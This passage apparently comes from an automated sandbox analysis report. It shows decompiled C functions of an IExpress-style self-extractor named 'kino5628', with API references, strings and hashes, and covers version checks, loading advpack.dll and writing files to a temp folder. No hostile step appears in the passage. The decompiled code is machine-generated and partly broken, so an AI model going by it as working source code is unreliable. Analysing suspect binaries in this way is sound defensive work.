								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x8e9a40 = _t119;
						 *0x8e8184 = 1;
						 *0x8e8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x8e9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x8e8184 = _t135;
							 *0x8e8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E008E44B9(0, _t138);
					L66:
					return E008E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x008e36f9
0x008e3700
0x008e370c
0x008e3716
0x008e3718
0x008e371b
0x008e3721
0x008e372b
0x008e373d
0x008e3745
0x008e3746
0x008e3746
0x008e3749
0x008e37ab
0x008e37ad
0x008e37ae
0x008e37b3
0x008e37b8
0x008e37b8
0x008e37bf
0x008e37bf
0x008e37c5
0x00000000
0x00000000
0x008e37cb
0x008e37cd
0x00000000
0x00000000
0x008e37d5
0x008e37db
0x008e37e8
0x008e37ea
0x008e37ea
0x008e37ea
0x008e37f0
0x008e37f6
0x008e3805
0x008e3817
0x008e382b
0x008e3830
0x008e3836
0x008e383b
0x008e383d
0x008e38eb
0x008e38eb
0x008e38f2
0x008e390c
0x008e3911
0x008e3911
0x008e3913
0x008e394d
0x008e394d
0x008e394f
0x008e38a9
0x008e38a9
0x008e38b0
0x008e38b2
0x008e38b9
0x008e38bb
0x008e38c1
0x008e3975
0x008e38c7
0x008e38de
0x008e38e0
0x008e38e0
0x008e397b
0x008e397d
0x008e39a9
0x008e397f
0x008e3982
0x008e398b
0x008e398d
0x008e398f
0x008e399f
0x008e39a1
0x008e3991
0x008e3991
0x008e3991
0x008e398f
0x008e39af
0x008e39b6
0x008e3a0f
0x008e3a0f
0x008e3a11
0x008e3a13
0x008e3a19
0x00000000
0x008e39b8
0x008e39b8
0x008e39ba
0x00000000
0x00000000
0x008e39bc
0x008e39bf
0x00000000
0x00000000
0x008e39c3
0x008e39c9
0x008e39ce
0x008e39d0
0x008e39e3
0x008e39e5
0x008e39e6
0x008e39f1
0x008e39f7
0x008e39fa
0x008e3a01
0x008e3a04
0x00000000
0x00000000
0x008e3a06
0x008e3a09
0x008e3a09
0x008e3a0b
0x008e3a0b
0x00000000
0x008e3a09
0x008e39fc
0x00000000
0x008e39fc
0x008e39d3
0x008e39d8
0x008e39da
0x00000000
0x00000000
0x00000000
0x008e39dc
0x008e39b6
0x008e3955
0x008e395b
0x00000000
0x00000000
0x008e3961
0x008e3963
0x00000000
0x00000000
0x008e3969
0x008e3969
0x00000000
0x008e3969
0x008e3915
0x008e3915
0x008e391b
0x008e391f
0x00000000
0x00000000
0x008e392d
0x008e3933
0x008e3938
0x008e393a
0x00000000
0x00000000
0x008e3940
0x008e3946
0x008e394b
0x00000000
0x008e394b
0x00000000
0x008e38f2
0x008e3843
0x008e3845
0x00000000
0x00000000
0x008e384b
0x008e384d
0x008e3883
0x008e3885
0x00000000
0x00000000
0x008e389a
0x008e389e
0x008e389e
0x00000000
0x00000000
0x008e38a0
0x008e38a0
0x008e38a2
0x00000000
0x00000000
0x008e38a4
0x00000000
0x008e38a4
0x008e384f
0x008e3851
0x008e3857
0x008e386e
0x008e3877
0x008e387b
0x00000000
0x00000000
0x00000000
0x008e3881
0x008e3859
0x008e385c
0x008e3862
0x008e3866
0x00000000
0x00000000
0x008e3868
0x00000000
0x008e38f4
0x008e38f4
0x008e38f5
0x008e38fb
0x008e3901
0x008e3901
0x00000000
0x008e390a
0x008e374b
0x008e374e
0x008e375c
0x008e3764
0x008e3769
0x008e376e
0x008e3771
0x008e379c
0x008e379f
0x00000000
0x00000000
0x008e37a3
0x008e37a4
0x00000000
0x008e37a4
0x008e3773
0x008e3777
0x008e3778
0x008e377f
0x008e3781
0x008e378e
0x008e378e
0x008e3794
0x00000000
0x008e3794
0x008e3783
0x00000000
0x00000000
0x008e3785
0x008e378c
0x00000000
0x00000000
0x00000000
0x008e378c
0x008e3750
0x00000000
0x008e372d
0x008e372d
0x008e396b
0x008e396b
0x008e396c
0x008e396e
0x008e396f
0x008e3a1e
0x008e3a1e
0x008e3a22
0x008e3a27
0x008e3a3e
0x008e3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 008E3723
MessageBeep.USER32(00000000), ref: 008E39C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 008E39F1

Strings

doza2, xrefs: 008E39E9, 008E3A19
3, xrefs: 008E3785

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: ccc33b45a7587238f82f60670147cc7004a6075413699a34eaf24c3c19b36ea3
Instruction ID: 66b16fb0d8182fd60673e5ca8a1a20069d95675f348709a8453a152e2b6e0ee2
Opcode Fuzzy Hash: ccc33b45a7587238f82f60670147cc7004a6075413699a34eaf24c3c19b36ea3
Instruction Fuzzy Hash: 5691D2B1A012E89BDB759A16CD89BBA77B1FF47304F1501B9D889EB241D7718F80CB41

Uniqueness

Uniqueness Score: -1.00%

Function 008E6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E008E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x8e8004; // 0xaf179a30
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E008E1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E008E658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E008E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x008e6495
0x008e6495
0x008e64a0
0x008e64a7
0x008e64ab
0x008e64bd
0x008e64c2
0x008e64d3
0x008e64df
0x008e64e8
0x008e6502
0x008e64ee
0x008e64f9
0x008e64f9
0x008e6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 008E64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 008E64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 008E6502

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E64AC
advpack.dll, xrefs: 008E64C2, 008E64CD, 008E6501

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-3761280616
Opcode ID: cceeecd90bc1af8c5c95e9ca263751c02cf5a0bedeefc5f31494b5a4d56daac9
Instruction ID: 9347c6d07c8e19ed44964f534fc676ee80333988f48f4aac6012cd5c045dc197
Opcode Fuzzy Hash: cceeecd90bc1af8c5c95e9ca263751c02cf5a0bedeefc5f31494b5a4d56daac9
Instruction Fuzzy Hash: 5301D630A00188DBDB54EB66DC89AEE7378FB62710F500195F585D61C0EFB0AE998A52

Uniqueness

Uniqueness Score: -1.00%

Function 008E28E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E008E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E008E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E008E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x008e28f1
0x008e28f4
0x008e28f7
0x008e28f9
0x008e28fc
0x008e28ff
0x008e2901
0x008e2907
0x008e2a62
0x008e2a64
0x008e290d
0x008e290d
0x008e290f
0x008e2912
0x008e2920
0x008e2937
0x00000000
0x00000000
0x008e2944
0x008e294a
0x008e294f
0x008e2a2f
0x008e2a32
0x008e2a34
0x008e2a37
0x008e2a41
0x00000000
0x00000000
0x008e2955
0x008e295e
0x008e2962
0x008e2969
0x008e296f
0x008e2974
0x008e298c
0x008e2a20
0x008e2a21
0x008e2a27
0x008e2a4c
0x008e2a4f
0x008e2a50
0x008e2a53
0x008e2a56
0x008e2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x008e29b2
0x008e29b2
0x008e29b5
0x008e29bd
0x008e29c3
0x008e29cc
0x008e29d5
0x008e29d7
0x008e29da
0x008e29dd
0x008e29df
0x008e29ec
0x008e29f8
0x008e29fc
0x008e29ff
0x008e2a02
0x008e2a07
0x008e2a0a
0x008e2a0f
0x008e2a19
0x008e2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2a0f
0x008e298c
0x008e2974
0x008e2962
0x00000000
0x008e294f
0x008e2912
0x008e2a65
0x008e2a68
0x008e2a6c
0x008e2a6f
0x008e2a6f
0x008e2a7d

APIs

GlobalFree.KERNEL32 ref: 008E2A6F

Part of subcall function 008E2773: CharUpperA.USER32(AF179A30,00000000,00000000,00000000), ref: 008E27A8
Part of subcall function 008E2773: CharNextA.USER32(0000054D), ref: 008E27B5
Part of subcall function 008E2773: CharNextA.USER32(00000000), ref: 008E27BC
Part of subcall function 008E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E2829
Part of subcall function 008E2773: RegQueryValueExA.ADVAPI32(?,008E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E2852
Part of subcall function 008E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E2870
Part of subcall function 008E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,008E3938,?,?,?,?,-00000005), ref: 008E2958
GlobalLock.KERNEL32 ref: 008E2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,008E3938,?,?,?,?,-00000005,?), ref: 008E2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 008E2A81

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 3d4c41dc86a2a5df9e89669db1904cb69b6a8f6fe935f08ee50342a821ce2d9e
Instruction ID: 2ea28b6da1083deb9fc9c4808601f608e4200e2be940e101a1424257b6a56479
Opcode Fuzzy Hash: 3d4c41dc86a2a5df9e89669db1904cb69b6a8f6fe935f08ee50342a821ce2d9e
Instruction Fuzzy Hash: 39514C31D00269DFCB25DF99D884AAEFBB9FF49700F14402AE911E7211D7319A41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008E4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E008E4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E008E468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E008E468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E008E44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E008E44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x008e417d
0x008e418f
0x008e4193
0x008e41b7
0x008e41d3
0x008e41e6
0x00000000
0x008e41e7
0x008e41d5
0x008e41d6
0x008e41d8
0x008e41d9
0x008e41da
0x008e41df
0x008e41e1
0x00000000
0x008e41e1
0x008e41b9
0x008e41ba
0x008e41bc
0x008e41bd
0x008e41be
0x00000000
0x008e41be
0x00000000

APIs

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,008E30B4), ref: 008E4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,008E30B4), ref: 008E41E7

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Strings

<None>, xrefs: 008E41C5
FINISHMSG, xrefs: 008E4173, 008E41AB

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 17d9f59d1848bbe8cce24be34a7035140cc980c03aa57d2b93c845208a9fe566
Instruction ID: 80494bc21408b6d7ec52d87302d82119393a84794c38c0737b8cc184457f2d74
Opcode Fuzzy Hash: 17d9f59d1848bbe8cce24be34a7035140cc980c03aa57d2b93c845208a9fe566
Instruction Fuzzy Hash: 0101D6B13002947BFB281A6B4C85F7B218DFBD7B99F005025B709D52C099A8DC41417A

Uniqueness

Uniqueness Score: -1.00%

Function 008E19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E008E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x8e8004; // 0xaf179a30
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E008E43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x8e9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E008E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x008e19e0
0x008e19e0
0x008e19eb
0x008e19f2
0x008e19f9
0x008e19fc
0x008e1a01
0x008e1a2a
0x008e1a2e
0x008e1a3e
0x008e1a4f
0x008e1a62
0x008e1a6a
0x00000000
0x008e1a03
0x008e1a06
0x008e1a20
0x008e1a20
0x008e1a08
0x008e1a08
0x008e1a14
0x00000000
0x008e1a16
0x008e1a18
0x008e1a70
0x008e1a72
0x008e1a72
0x008e1a14
0x008e1a06
0x008e1a81

APIs

EndDialog.USER32(?,?), ref: 008E1A18
GetDesktopWindow.USER32 ref: 008E1A24
LoadStringA.USER32(?,?,00000200), ref: 008E1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 008E1A62
MessageBeep.USER32(000000FF), ref: 008E1A6A

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 30d69625d8be1601f8a4b68f10cc25ea51bff86132629db4b99b40d713823158
Instruction ID: 1f23e402706b8c1df3c6db0d9d2b012ca325031fad601e33aded9aecb3e23356
Opcode Fuzzy Hash: 30d69625d8be1601f8a4b68f10cc25ea51bff86132629db4b99b40d713823158
Instruction Fuzzy Hash: C911E131500199AFCB04EF68DE4CABE77B8FF0A700F108165F916DA190DA30AE00CB96

Uniqueness

Uniqueness Score: -1.00%

Function 008E7155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x8e8004; // 0xaf179a30
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x8e8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x8e8004 = _t39;
				}
				_t37 =  !_t36;
				 *0x8e8008 = _t37;
				return _t37;
			}

0x008e715d
0x008e7161
0x008e7165
0x008e7178
0x008e7182
0x008e718e
0x008e7197
0x008e71a0
0x008e71b1
0x008e71b8
0x008e71c4
0x008e71c7
0x008e71cb
0x008e71d5
0x008e71da
0x008e71da
0x008e71dc
0x008e71dc
0x008e71e2
0x008e71e5
0x008e71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008E7182
GetCurrentProcessId.KERNEL32 ref: 008E7191
GetCurrentThreadId.KERNEL32 ref: 008E719A
GetTickCount.KERNEL32 ref: 008E71A3
QueryPerformanceCounter.KERNEL32(?), ref: 008E71B8

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: d7dc40a945a46e268246495d3887eb77b30c64d299f3269a9b8490424ec3d40d
Instruction ID: c7847394b1214b027aa0873cc06f2a9100a2a3b18d62c4cdd3e78acd73c4b49a
Opcode Fuzzy Hash: d7dc40a945a46e268246495d3887eb77b30c64d299f3269a9b8490424ec3d40d
Instruction Fuzzy Hash: D5112E71D05648DFCB14DFB9DA88A9EB7F4FF49715F614866E806EB210EB309E048B41

Uniqueness

Uniqueness Score: -1.00%

Function 008E63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E008E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x8e8004; // 0xaf179a30
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E008E1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				E008E658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x8e9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x8e9124 = 0x80070052;
					_t37 = 0;
				}
				return E008E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x008e63cb
0x008e63d2
0x008e63d8
0x008e63ea
0x008e63f3
0x008e6401
0x008e6402
0x008e6410
0x008e6415
0x008e6433
0x008e6438
0x008e6449
0x008e6463
0x008e646d
0x008e6477
0x008e6477
0x008e647a
0x008e643a
0x008e643a
0x008e6444
0x008e6444
0x008e6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 008E642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 008E645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 008E647A

Strings

